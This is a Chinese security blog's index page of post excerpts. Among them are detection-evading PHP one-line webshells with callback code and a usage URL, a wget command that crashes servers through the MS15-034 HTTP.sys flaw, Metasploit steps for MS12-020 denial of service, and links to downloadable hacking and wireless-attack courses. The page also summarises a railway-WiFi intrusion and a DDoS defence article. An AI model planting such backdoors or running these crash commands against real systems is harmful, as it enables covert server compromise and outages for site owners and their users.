分享一些无特征PHP一句话

2015-11-25 Mr.linus 信息安全

分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等) 原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html 所有一句话使用方法基本都是: http:// target/shell.php?e=assert 密码pass 01 $e = $_REQUEST['e']; $arr = array($_POST['pass'],); array_filter(...

阅读全文>>

标签: php 一句话木马

评论(0) 浏览(1138)

MS15-034:HTTP.sys 远程代码执行漏洞利用

2015-11-20 Mr.linus 信息安全

只需一条命令请求可导致服务器蓝屏 wget –header=”Range: bytes=18-18446744073709551615″  http:127.0.0.1/t.img  

阅读全文>>

标签: 漏洞 代码执行

评论(0) 浏览(1981)

MS12-020漏洞利用

2015-11-20 Mr.linus 信息安全

攻击目标 192.168.68.200 加载ms12_020模块 设置IP地址     set RHOST 192.168.68.200 设置端口地址 set RPORT 3389   执行之后 理论上目标机器已经蓝屏 ,已断开连接  

阅读全文>>

标签: 漏洞

评论(0) 浏览(1197)

2015web渗透脚本入侵百集教程分享(无key)

2015-10-31 Mr.linus 信息安全

    01-第一天-上午-基础部分(上).zip 02-第二天-上午-基础部分(中).zip 03-第一天-上午-基础部分(下).zip 04-第一天-下午-Windows基础(上).zip 05-第一天-下午-Windows基础(中).zip 06-第一天-下午-Windows基础(下).zip 07-第二天.zip 08-第二天.zip 09-第三天-1.zip 10-第三天-2.zip 11-第三天-3.zip 12-第四天-1.zip 13-第四天-2.zip 14-第四天-3.zip 15-sql注入-A...

阅读全文>>

标签: 渗透 脚本 入侵

评论(1) 浏览(2484)

免费共享:<无线网络黑客攻防系列教程>35课全

2015-10-5 Mr.linus 信息安全

  本套课程于2015.3完成,当时进行了持续近2个星期的出售。 现在把视频共享出来,包括所用到的所有工具,都会在第一课的文本里找到下载地址。 本套课程涉及到了“加密破解、机制突破、干扰通讯、报文处理、内网渗透、权限提升、维持访问”等方面内容,涉及到了大部分的中小型无线网络攻击技巧。 本套教程与百度网盘下载,avi形式 后缀,可网盘内在线观看。 下载地址: 链接: http://pan.baidu.com/s/1dDlqiLr 密码: u7ns 视频录制:L...

阅读全文>>

评论(0) 浏览(2457)

对火车站免费WiFi的测试(整个网络沦陷/多个火车站中招/影响用户手机安全)

2015-10-3 Mr.linus 信息安全

搜索发现已经有人提出来了,不过没有把问题扩大化,影响还是相当大的,希望重视一下 继上次在石家庄没有完成的测试之后,回到家里想了想,貌似北京西站那边也有air-station的WiFi热点,所以很期待路过北京西站的测试。如愿以偿,正好到北京办点事情,然后就早点去北京西站,找个没人的地方,开始了测试。 一、设计缺陷,导致任意号码登录(小漏洞) 连上无线网之后,浏览器打开默认的界面,随便瞎填写一些内容就行。,之后抓取响应包,修改响应包放行就好了。 二、命令执行(很老的漏洞了。。。) 1. 跟上次一样...

阅读全文>>

评论(0) 浏览(1760)

百度回应质疑:防御1Tbps DDoS攻击流量是如何做到的?

2015-10-1 Mr.linus 信息安全

1Tbps流量——83个春运期间12306官网最高峰值带宽流量;足够让一座城市断网好几次…… 当大流量攻击来袭,网站该如何应对?在9.18日百度云安全用一场DDoS攻防实战演练,形象、直观地告诉了我们答案。 不少来自安全圈、IT界的怀疑声音:这么大的流量,是从哪来的?目前全球最高的抗D记录也不过400多G,百度这次声称的流量是真实的吗,攻击的手段是足够“专业”的吗?…… 类似的疑问还有很多。 我们就通过技术解析来阐释,百度云安全是如何做到1Tbps压制能力的? 问题一:现场演练中1Tbps攻击流量是怎么来的? 本次演练以流...

阅读全文>>

标签: 攻击 ddos

评论(0) 浏览(1287)

Powered by Mr.Linus 蜀ICP备16005020号